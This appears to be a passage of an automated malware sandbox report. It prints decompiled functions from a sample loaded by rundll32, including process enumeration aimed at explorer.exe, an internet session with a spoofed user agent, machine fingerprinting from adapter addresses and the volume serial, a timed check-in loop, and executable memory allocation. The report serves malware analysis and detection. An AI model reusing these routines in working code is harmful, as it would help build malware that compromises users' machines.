                          				if(_t20 == 0) {
                          					return 0;
                          				}
                          				lstrcpyA(_a4,  &_v276);
                          				lstrcatA(_a4, "\\");
                          				lstrcatA(_a4,  &_v536);
                          				return 1;
                          			}










                          APIs
                            • Part of subcall function 042D2E90: K32EnumProcesses.KERNEL32(?,00001000,042D2E03,?,042D2E03,explorer.exe), ref: 042D2EAD
                            • Part of subcall function 042D3000: OpenProcess.KERNEL32(00000400,00000000,?,?,042D2E45,?,?,00000104,?,00000104), ref: 042D3011
                          • lstrcpyA.KERNEL32(00000104,?), ref: 042D2E57
                          • lstrcatA.KERNEL32(00000104,042D42B8), ref: 042D2E66
                          • lstrcatA.KERNEL32(00000104,?), ref: 042D2E77
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$EnumOpenProcessProcesseslstrcpy
                          • String ID: explorer.exe
                          • API String ID: 1774016706-3187896405
                          • Opcode ID: c3864c181622bf66285e720043fca6c7c4994e7e8f544e424f4ed609b8e093d5
                          • Instruction ID: d9d824c2ed09829afb640811ff686313d8b19c82581c52fad9cc55b2e6b3741f
                          • Opcode Fuzzy Hash: c3864c181622bf66285e720043fca6c7c4994e7e8f544e424f4ed609b8e093d5
                          • Instruction Fuzzy Hash: B41148B5F10209ABDB14EFA8DD49BDE77B8EB48300F004194F609D7241E674EA44CFA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 84%
                          			E0281B694(intOrPtr __ecx, char __edx, void* __edi) {
                          				intOrPtr _v8;
                          				char _v9;
                          				intOrPtr _v16;
                          				struct HDC__* _v20;
                          				void* __ebp;
                          				intOrPtr _t55;
                          				intOrPtr* _t58;
                          				intOrPtr* _t59;
                          				intOrPtr* _t81;
                          				intOrPtr _t93;
                          				intOrPtr _t95;
                          				intOrPtr _t97;
                          				intOrPtr _t98;
                          				intOrPtr _t101;
                          				char _t103;
                          				void* _t128;
                          				void* _t129;
                          				void* _t130;
                          
                          				_t128 = __edi;
                          				_t103 = __edx;
                          				_t101 = __ecx;
                          				if(__edx != 0) {
                          					_t130 = _t130 + 0xfffffff0;
                          					_t55 = E027D3570(_t55, _t129);
                          				}
                          				_v16 = _t101;
                          				_v9 = _t103;
                          				_v8 = _t55;
                          				E027F3854(_v16, 0);
                          				_t58 =  *0x28643a8; // 0x2863584
                          				 *((intOrPtr*)(_t58 + 4)) = _v8;
                          				 *_t58 = E0281BC04;
                          				_t59 =  *0x28643b8; // 0x286358c
                          				 *((intOrPtr*)(_t59 + 4)) = _v8;
                          				 *_t59 = E0281BC24;
                          				E0281BC44(_v8); // executed
                          				 *((intOrPtr*)(_v8 + 0x3c)) = GetKeyboardLayout(0);
                          				 *((intOrPtr*)(_v8 + 0x4c)) = E027D31DC(1);
                          				 *((intOrPtr*)(_v8 + 0x50)) = E027D31DC(1);
                          				 *((intOrPtr*)(_v8 + 0x54)) = E027D31DC(1);
                          				 *((intOrPtr*)(_v8 + 0x58)) = E027D31DC(1);
                          				 *((intOrPtr*)(_v8 + 0x7c)) = E027D31DC(1);
                          				_v20 = GetDC(0);
                          				 *((intOrPtr*)(_v8 + 0x40)) = GetDeviceCaps(_v20, 0x5a);
                          				ReleaseDC(0, _v20);
                          				_t81 =  *0x286453c; // 0x28658ac
                          				 *((intOrPtr*)( *_t81))(0, 0, E02817054,  *((intOrPtr*)(_v8 + 0x58)));
                          				 *((intOrPtr*)(_v8 + 0x84)) = E027F7304(1);
                          				 *((intOrPtr*)(_v8 + 0x88)) = E027F7304(1);
                          				 *((intOrPtr*)(_v8 + 0x80)) = E027F7304(1);
                          				E0281C1EC(_v8, _t128); // executed
                          				_t93 =  *((intOrPtr*)(_v8 + 0x84));
                          				 *((intOrPtr*)(_t93 + 0xc)) = _v8;
                          				 *((intOrPtr*)(_t93 + 8)) = E0281C038;
                          				_t95 =  *((intOrPtr*)(_v8 + 0x88));
                          				 *((intOrPtr*)(_t95 + 0xc)) = _v8;
                          				 *((intOrPtr*)(_t95 + 8)) = E0281C038;
                          				_t97 =  *((intOrPtr*)(_v8 + 0x80));
                          				 *((intOrPtr*)(_t97 + 0xc)) = _v8;
                          				 *((intOrPtr*)(_t97 + 8)) = E0281C038;
                          				_t98 = _v8;
                          				if(_v9 != 0) {
                          					E027D35C8(_t98);
                          					_pop( *[fs:0x0]);
                          				}
                          				return _v8;
                          			}





















                          APIs
                          • GetKeyboardLayout.USER32(00000000), ref: 0281B6E8
                          • GetDC.USER32(00000000), ref: 0281B74F
                          • GetDeviceCaps.GDI32(?,0000005A), ref: 0281B75D
                          • ReleaseDC.USER32(00000000,?), ref: 0281B76E
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: CapsDeviceKeyboardLayoutRelease
                          • String ID:
                          • API String ID: 3331096196-0
                          • Opcode ID: 6832fa18dd0a45eb187f7463bf580ea6f11c9ce9534c0253ebb0fa962d8d6a8c
                          • Instruction ID: 7998952bb4ec15ee7bfb3ba654e59f4ae11de09d82f8cba1343dcbfb3215712a
                          • Opcode Fuzzy Hash: 6832fa18dd0a45eb187f7463bf580ea6f11c9ce9534c0253ebb0fa962d8d6a8c
                          • Instruction Fuzzy Hash: 75510278A40249EFCB44DF98DA88A9DB7F6BF48304F2481E5D9089B361D731AE45DF41
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 85%
                          			E042D2F30(long _a4, CHAR* _a8) {
                          				int _v8;
                          				void* _v12;
                          				CHAR* _v16;
                          				void* _v20;
                          				char _v280;
                          				void* _t29;
                          				void* _t48;
                          
                          				_t29 = OpenProcess(0x400, 0, _a4);
                          				_v12 = _t29;
                          				if(_v12 == 0) {
                          					L12:
                          					return 0;
                          				}
                          				_push(0x104);
                          				_push( &_v280);
                          				_push(_v12); // executed
                          				L042D3BE3(); // executed
                          				_v20 = _t29;
                          				FindCloseChangeNotification(_v12); // executed
                          				if(_v20 <= 0) {
                          					goto L12;
                          				}
                          				_v16 = 0;
                          				_v8 = 0;
                          				while(_v8 < _v20) {
                          					if( *((char*)(_t48 + _v8 - 0x114)) == 0x5c) {
                          						_v16 = _t48 + _v8 - 0x113;
                          					}
                          					if( *((char*)(_t48 + _v8 - 0x114)) != 0) {
                          						_v8 = _v8 + 1;
                          						continue;
                          					} else {
                          						break;
                          					}
                          				}
                          				if(_v16 == 0) {
                          					goto L12;
                          				}
                          				lstrcpyA(_a8, _v16);
                          				return 1;
                          			}










                          APIs
                          • OpenProcess.KERNEL32(00000400,00000000,042D2E03), ref: 042D2F44
                          • K32GetProcessImageFileNameA.KERNEL32(00000000,?,00000104), ref: 042D2F67
                          • FindCloseChangeNotification.KERNEL32(00000000,00000000,?,00000104), ref: 042D2F73
                          • lstrcpyA.KERNEL32(00000000,00000000), ref: 042D2FDE
                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$ChangeCloseFileFindImageNameNotificationOpenlstrcpy
                          • String ID:
                          • API String ID: 1999166229-0
                          • Opcode ID: f02c557c0a5a9a384e4f0fa4b576357284d83adc626bb705a7f88d31098bc31d
                          • Instruction ID: db975b2e94a310c57c9012f3f8c8b229c228c4477df51168b12c2c6ba2b608db
                          • Opcode Fuzzy Hash: f02c557c0a5a9a384e4f0fa4b576357284d83adc626bb705a7f88d31098bc31d
                          • Instruction Fuzzy Hash: FA213870F1420CEFCB18DF98D984BEDB7B5FB44305F108999E519A7280D3B46A84DB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E042D24F0() {
                          				void* _t1;
                          				void* _t2;
                          
                          				if( *0x42d7270 == 0) {
                          					_t2 = InternetOpenA("Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko", 0, 0, 0, 0); // executed
                          					 *0x42d7270 = _t2;
                          				}
                          				_t1 =  *0x42d7270; // 0xcc0004
                          				return _t1;
                          			}





                          APIs
                          • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko,00000000,00000000,00000000,00000000), ref: 042D2509
                          Strings
                          • Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko, xrefs: 042D2504
                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: InternetOpen
                          • String ID: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          • API String ID: 2038078732-3333256863
                          • Opcode ID: 5300d3ee22748798f6fe29fe7a84bc0b4ac06f38ae7f348cb932e52306a9156d
                          • Instruction ID: 443c4d46f23a9f22ac8f7b55ee9c08cd899ce08f3e67e1bec486b581cc0f176b
                          • Opcode Fuzzy Hash: 5300d3ee22748798f6fe29fe7a84bc0b4ac06f38ae7f348cb932e52306a9156d
                          • Instruction Fuzzy Hash: 9FD0C930B92744ABEB349E6CBD0EF1033A4F384B15F900011B208661C1CBBC78598A59
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 028D6DBB
                          • VirtualProtect.KERNEL32(?,?,00000000), ref: 028D6F62
                          Memory Dump Source
                          • Source File: 00000005.00000002.2668727144.00000000028D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_28d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocProtect
                          • String ID:
                          • API String ID: 2447062925-0
                          • Opcode ID: 908ff1232115a672daceacccd1e388f79e6961393f0a3edebe41de14d0d5fad2
                          • Instruction ID: 1aea23dd1798c91792655a3c73cf68a861c86439dda07cf433aeddffb75de7a7
                          • Opcode Fuzzy Hash: 908ff1232115a672daceacccd1e388f79e6961393f0a3edebe41de14d0d5fad2
                          • Instruction Fuzzy Hash: 9991DA79A00109DFCB48CF98D590EAEB7B6FF88304F148159E809AB341D735EA56CFA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualProtect.KERNEL32(?,00000004,00000040,?), ref: 028D716B
                          • VirtualProtect.KERNEL32(?,00000004,?,?), ref: 028D71A3
                          Memory Dump Source
                          • Source File: 00000005.00000002.2668727144.00000000028D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_28d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ProtectVirtual
                          • String ID:
                          • API String ID: 544645111-0
                          • Opcode ID: 0a894fec6175854ae8b2712809d142e72fa9094a0c42227173d89027c1b642ac
                          • Instruction ID: c46a20dacc3467db527b866f1b36218408011467d5577e6fbb32ea9908a008b9
                          • Opcode Fuzzy Hash: 0a894fec6175854ae8b2712809d142e72fa9094a0c42227173d89027c1b642ac
                          • Instruction Fuzzy Hash: 2C416678A00209DFCF04CF88C891AEDB7B6FF88314F148299E919AB355D775AA45CF94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • LoadLibraryExA.KERNEL32(?,00000000,00000000), ref: 028D6B7B
                          • GetProcAddress.KERNEL32(?,?), ref: 028D6BDA
                          Memory Dump Source
                          • Source File: 00000005.00000002.2668727144.00000000028D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_28d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID:
                          • API String ID: 2574300362-0
                          • Opcode ID: 6d5c053a8b1e1b56e3ea23abd1abaa051be6f67e11c47a19d1c305c84768a659
                          • Instruction ID: 24e3a90b313c5a81451c7d9b1d72a25b71e93645eb345794d47afb51ce22fd28
                          • Opcode Fuzzy Hash: 6d5c053a8b1e1b56e3ea23abd1abaa051be6f67e11c47a19d1c305c84768a659
                          • Instruction Fuzzy Hash: 00319678A00219DFCB04CF98C890BADB7B5FF88314F1486A9D819AB355D735AA45CF94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 83%
                          			E042D2E90(CHAR* _a4) {
                          				signed int _v8;
                          				unsigned int _v12;
                          				unsigned int _v16;
                          				char _v276;
                          				char _v4372;
                          				signed int _t23;
                          				void* _t26;
                          				int _t29;
                          				void* _t40;
                          				void* _t41;
                          
                          				E042D1420(0x1110);
                          				_t23 =  &_v12;
                          				_push(_t23);
                          				_push(0x1000);
                          				_push( &_v4372); // executed
                          				L042D3BDD(); // executed
                          				if(_t23 != 0) {
                          					_v16 = _v12 >> 2;
                          					_v8 = 0;
                          					while(_v8 < _v16) {
                          						_t26 = E042D2F30( *((intOrPtr*)(_t40 + _v8 * 4 - 0x1110)),  &_v276); // executed
                          						_t41 = _t41 + 8;
                          						if(_t26 == 0) {
                          							L8:
                          							_t23 = _v8 + 1;
                          							_v8 = _t23;
                          							continue;
                          						}
                          						_t29 = lstrcmpiA( &_v276, _a4); // executed
                          						if(_t29 != 0) {
                          							goto L8;
                          						}
                          						return  *((intOrPtr*)(_t40 + _v8 * 4 - 0x1110));
                          					}
                          					return _t23 | 0xffffffff;
                          				}
                          				return _t23 | 0xffffffff;
                          			}













                          APIs
                          • K32EnumProcesses.KERNEL32(?,00001000,042D2E03,?,042D2E03,explorer.exe), ref: 042D2EAD
                          • lstrcmpiA.KERNEL32(?,042D2E03), ref: 042D2F07
                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: EnumProcesseslstrcmpi
                          • String ID:
                          • API String ID: 1246086236-0
                          • Opcode ID: db4a566eff626a45b078d73c5ac58332103477f4d940c420c0e2d80d875773ed
                          • Instruction ID: 63f43f11ef112b9f275a7019ee10b1de10c7b1838a229228443fd4ef898fff99
                          • Opcode Fuzzy Hash: db4a566eff626a45b078d73c5ac58332103477f4d940c420c0e2d80d875773ed
                          • Instruction Fuzzy Hash: E8115270F20108EBCB19DF94D841AEDB3B8BF48344F508AD9EA1593180E7B5BE40DB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 028D68A4
                          Strings
                          Memory Dump Source
                          • Source File: 00000005.00000002.2668727144.00000000028D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_28d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocVirtual
                          • String ID: VirtualAlloc
                          • API String ID: 4275171209-164498762
                          • Opcode ID: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                          • Instruction ID: 8294fdad5df03de1e777259f7d69bfb2a0d74c4ab5dd0b73d8583a5b16d60f77
                          • Opcode Fuzzy Hash: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                          • Instruction Fuzzy Hash: 1B111F64D082CDEEEF01D7E89409BEFBFB55F11704F044098D6486B282E6BE57588BB6
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0281BC44(intOrPtr __eax) {
                          				intOrPtr _v8;
                          				signed int _v12;
                          				struct HINSTANCE__* _v16;
                          				struct HICON__* _t25;
                          				void* _t27;
                          				struct HINSTANCE__* _t28;
                          
                          				_v8 = __eax;
                          				 *((intOrPtr*)(_v8 + 0x60)) = LoadCursorA(0, 0x7f00);
                          				_v12 = 0xffffffea;
                          				do {
                          					if(_v12 < 0xffffffef || _v12 > 0xfffffff4) {
                          						if(_v12 != 0xffffffeb) {
                          							_v16 = 0;
                          						} else {
                          							goto L4;
                          						}
                          					} else {
                          						L4:
                          						_t28 =  *0x2865668; // 0x27d0000
                          						_v16 = _t28;
                          					}
                          					_t25 = LoadCursorA(_v16,  *(0x2863d74 + _v12 * 4)); // executed
                          					_t27 = E0281BDA8(_v8, _t25, _v12);
                          					_v12 = _v12 + 1;
                          				} while (_v12 != 0xffffffff);
                          				return _t27;
                          			}










                          APIs
                          • LoadCursorA.USER32(00000000,00007F00), ref: 0281BC54
                          • LoadCursorA.USER32(?,000000EB), ref: 0281BC96
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: CursorLoad
                          • String ID:
                          • API String ID: 3238433803-0
                          • Opcode ID: f68140bb902021483f764d5ecb4e1212ea959ab31011903cc604e3f0c8846740
                          • Instruction ID: 9e1ed53879f65b367b44839e726051193b68d408ffd1d29acf41a17760e84d94
                          • Opcode Fuzzy Hash: f68140bb902021483f764d5ecb4e1212ea959ab31011903cc604e3f0c8846740
                          • Instruction Fuzzy Hash: 6601DA78E00209EFDB50DBACD88499DB7B9EB05324F2043A5D569E72D0D7316A51CF41
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E042D2490() {
                          				int _v8;
                          				long _v12;
                          				char _v272;
                          				int _t13;
                          				void* _t18;
                          
                          				_v8 = GetWindowsDirectoryA( &_v272, 0x104);
                          				if(_v8 == 0) {
                          					L3:
                          					return 0;
                          				}
                          				 *((char*)(_t18 + 0xfffffffffffffef7)) = 0;
                          				_t13 = GetVolumeInformationA( &_v272, 0, 0,  &_v12, 0, 0, 0, 0); // executed
                          				if(_t13 == 0) {
                          					goto L3;
                          				}
                          				return _v12;
                          			}









                          APIs
                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 042D24A5
                          • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 042D24DB
                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: DirectoryInformationVolumeWindows
                          • String ID:
                          • API String ID: 3487004747-0
                          • Opcode ID: 32858df302bf139e12d0a8f03f38b1ef4fa7d9006168f4a9b3bc632831f5b1f4
                          • Instruction ID: a95496f7074f4099bbbeb3d3deeb5154822994d7c7dd4e600627b602631ee7bc
                          • Opcode Fuzzy Hash: 32858df302bf139e12d0a8f03f38b1ef4fa7d9006168f4a9b3bc632831f5b1f4
                          • Instruction Fuzzy Hash: 04F05E70B51308ABE734DBA4DC1ABEA7768D701700F1041E4AA45EA1C0D7F4AA84CFA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 82%
                          			E042D1870(void* __eflags) {
                          				intOrPtr _v8;
                          				long _v12;
                          				intOrPtr _v16;
                          				intOrPtr _v20;
                          				intOrPtr _v24;
                          				char _v28;
                          				intOrPtr _v32;
                          				char _v36;
                          				intOrPtr _t28;
                          				intOrPtr _t29;
                          				intOrPtr _t30;
                          				void* _t32;
                          				intOrPtr _t35;
                          				void* _t38;
                          				void* _t40;
                          				void* _t52;
                          				void* _t55;
                          
                          				_v12 = 0x100000;
                          				_t28 = E042D1390(_v12); // executed
                          				_v20 = _t28;
                          				_t29 = E042D1390(_v12); // executed
                          				_v24 = _t29;
                          				_t30 = E042D1390(0x1000);
                          				_t55 = _t52 + 0xc;
                          				_v8 = _t30;
                          				_v32 = 1;
                          				while(1) {
                          					_t58 = _v32 - 1;
                          					if(_v32 != 1) {
                          						break;
                          					}
                          					_t32 = E042D1AA0( &_v36, _t58, _v20, _v12,  &_v36); // executed
                          					_t55 = _t55 + 0xc;
                          					if(_t32 != 1) {
                          						L12:
                          						Sleep(0xea60); // executed
                          						_t30 = E042D15C0();
                          						Sleep(0xea60); // executed
                          						continue;
                          					}
                          					_t35 = E042D1560(_v20 + 4, _v24);
                          					_t55 = _t55 + 8;
                          					_v36 = _t35;
                          					_v16 = _v24;
                          					while(1 != 0) {
                          						_v16 = E042D17B0(_v16, _v16, _v8);
                          						_t38 = E042D27B0(_v16, _v8);
                          						_t55 = _t55 + 0xc;
                          						if(_t38 == 1) {
                          							_v28 = 0;
                          							_t46 = _v8;
                          							_t40 = E042D1630(_v8, _v8,  &_v28);
                          							_t55 = _t55 + 8;
                          							if(_t40 == 1 && _v28 == 0) {
                          								E042D14E0(_t46, _v8);
                          								_t55 = _t55 + 4;
                          							}
                          						}
                          						if(_v16 != 0) {
                          							continue;
                          						} else {
                          							goto L12;
                          						}
                          					}
                          					goto L12;
                          				}
                          				return _t30;
                          			}





















                          APIs
                            • Part of subcall function 042D1390: GetProcessHeap.KERNEL32(?,042D1886,00100000), ref: 042D139C
                            • Part of subcall function 042D1390: RtlAllocateHeap.NTDLL(028F0000,00000000,042D1886,?,042D1886,00100000), ref: 042D13BD
                            • Part of subcall function 042D1AA0: GetVersion.KERNEL32(?,042D18CD,?,00100000,?), ref: 042D1AAD
                            • Part of subcall function 042D1AA0: wsprintfA.USER32 ref: 042D1B5E
                          • Sleep.KERNEL32(0000EA60), ref: 042D195F
                          • Sleep.KERNEL32(0000EA60), ref: 042D196F
                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: HeapSleep$AllocateProcessVersionwsprintf
                          • String ID:
                          • API String ID: 1739176888-0
                          • Opcode ID: 4af7a933fddc20463fee907449698ad24d429565870155f8ef7a2feccadf699f
                          • Instruction ID: 5580ff67cca34f072e39b838e4443d540b23c434c008ffbcee928eb86ba6c507
                          • Opcode Fuzzy Hash: 4af7a933fddc20463fee907449698ad24d429565870155f8ef7a2feccadf699f
                          • Instruction Fuzzy Hash: 1331C3B5F20209EBEF10DFD4D840AFEB778AF08308F044528D409B2648E735BA64CB92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E027D15D4(void* __eax, void** __edx) {
                          				void* _t3;
                          				void** _t8;
                          				void* _t11;
                          				long _t14;
                          
                          				_t8 = __edx;
                          				if(__eax >= 0x100000) {
                          					_t14 = __eax + 0x0000ffff & 0xffff0000;
                          				} else {
                          					_t14 = 0x100000;
                          				}
                          				_t8[1] = _t14;
                          				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
                          				_t11 = _t3;
                          				 *_t8 = _t11;
                          				if(_t11 != 0) {
                          					_t3 = E027D1488(0x28655ec, _t8);
                          					if(_t3 == 0) {
                          						VirtualFree( *_t8, 0, 0x8000);
                          						 *_t8 = 0;
                          						return 0;
                          					}
                          				}
                          				return _t3;
                          			}








                          APIs
                          • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,027D18DD), ref: 027D1603
                          • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,027D18DD), ref: 027D162A
                          Memory Dump Source
                          • Source File: 00000005.00000002.2663993108.00000000027D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 027D0000, based on PE: true
                          • Associated: 00000005.00000002.2663913512.00000000027D0000.00000002.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667696393.0000000002863000.00000004.00000001.01000000.00000006.sdmp
                          • Associated: 00000005.00000002.2667971928.0000000002869000.00000002.00000001.01000000.00000006.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_27d0000_rundll32.jbxd
                          Similarity
                          • API ID: Virtual$AllocFree
                          • String ID:
                          • API String ID: 2087232378-0
                          • Opcode ID: 24a000190a06cdb371e100419e6716b7e0fb732d5b968c1ee4e69d5306f9c780
                          • Instruction ID: 32e1481a2ac73f6ca5e8a63f3f0c4dde1662bc30f05c037f54308a2507b5b487
                          • Opcode Fuzzy Hash: 24a000190a06cdb371e100419e6716b7e0fb732d5b968c1ee4e69d5306f9c780
                          • Instruction Fuzzy Hash: 60F0A7B6F0063016DB6155694C88B535AA69F45B91F994070FA0CFF3C8D6A1880146A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 71%
                          			E042D1C70(void* __eflags) {
                          				intOrPtr _v8;
                          				char _v12;
                          				intOrPtr _v16;
                          				intOrPtr _v20;
                          				signed int _v24;
                          				signed int _v28;
                          				signed int _v32;
                          				signed int _v36;
                          				intOrPtr _v40;
                          				intOrPtr _v44;
                          				intOrPtr _t33;
                          				intOrPtr _t34;
                          				intOrPtr _t36;
                          				void* _t61;
                          				void* _t62;
                          
                          				asm("xorps xmm0, xmm0");
                          				asm("movlpd [ebp-0x18], xmm0");
                          				_v12 = 0x8000;
                          				_t33 = E042D1390(_v12); // executed
                          				_t62 = _t61 + 4;
                          				_v16 = _t33;
                          				_v8 = _v16;
                          				_t34 = _v8;
                          				__imp__GetAdaptersAddresses(2, 0, 0, _t34,  &_v12); // executed
                          				_v20 = _t34;
                          				if(_v20 == 0) {
                          					while(_v8 != 0) {
                          						E042D14A0( &_v36, 0, 8);
                          						E042D1450( &_v36, _v8 + 0x2c,  *((intOrPtr*)(_v8 + 0x34)));
                          						_t62 = _t62 + 0x18;
                          						_v28 = _v28 ^ _v36;
                          						_v24 = _v24 ^ _v32;
                          						_v8 =  *((intOrPtr*)(_v8 + 8));
                          					}
                          				}
                          				E042D13D0(_v16); // executed
                          				_t36 = E042D2490(); // executed
                          				_v44 = _t36;
                          				_v40 = 0;
                          				return E042D1400(_v44, 0x20, _v40) ^ _v28;
                          			}



















                          APIs
                            • Part of subcall function 042D1390: GetProcessHeap.KERNEL32(?,042D1886,00100000), ref: 042D139C
                            • Part of subcall function 042D1390: RtlAllocateHeap.NTDLL(028F0000,00000000,042D1886,?,042D1886,00100000), ref: 042D13BD
                          • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,?,00008000), ref: 042D1CA8
                          Memory Dump Source
                          • Source File: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_5_2_42d0000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AdaptersAddressesAllocateProcess
                          • String ID:
                          • API String ID: 2964925633-0
                          • Opcode ID: a3d16a2f61c95b189ec453819ea0af62ad065d1e956fce76a8b202fbd92d765e
                          • Instruction ID: ef04411aaa43851a7bc392eb80af8eaf4f3d6bc6e7c90e0a6484450f559e7aa1
                          • Opcode Fuzzy Hash: a3d16a2f61c95b189ec453819ea0af62ad065d1e956fce76a8b202fbd92d765e
                          • Instruction Fuzzy Hash: 2A21D6B5E10209ABDB04DFE4D981BEEF7B5BF4C204F208559E905B7640E770AA54CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E027D5520(void* __eax) {
                          				char _v272;
                          				intOrPtr _t14;
                          				void* _t16;
                          				intOrPtr _t18;
                          				intOrPtr _t19;
                          
                          				_t16 = __eax;
                          				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
                          					_t3 = _t16 + 4; // 0x27d0000
                          					GetModuleFileNameA( *_t3,  &_v272, 0x105);
                          					_t14 = E027D575C(_t19); // executed
                          					_t18 = _t14;
                          					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
                          					if(_t18 == 0) {
                          						_t5 = _t16 + 4; // 0x27d0000
                          						 *((intOrPtr*)(_t16 + 0x10)) =  *_t5;
                          					}
                          				}
                          				return  *((intOrPtr*)(_t16 + 0x10));
                          			}









                          APIs
                          • GetModuleFileNameA.KERNEL32(027D0000,?,00000105), ref: 027D553E
                            • Part of subcall function 027D575C: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00001205,028630A4), ref: 027D5778
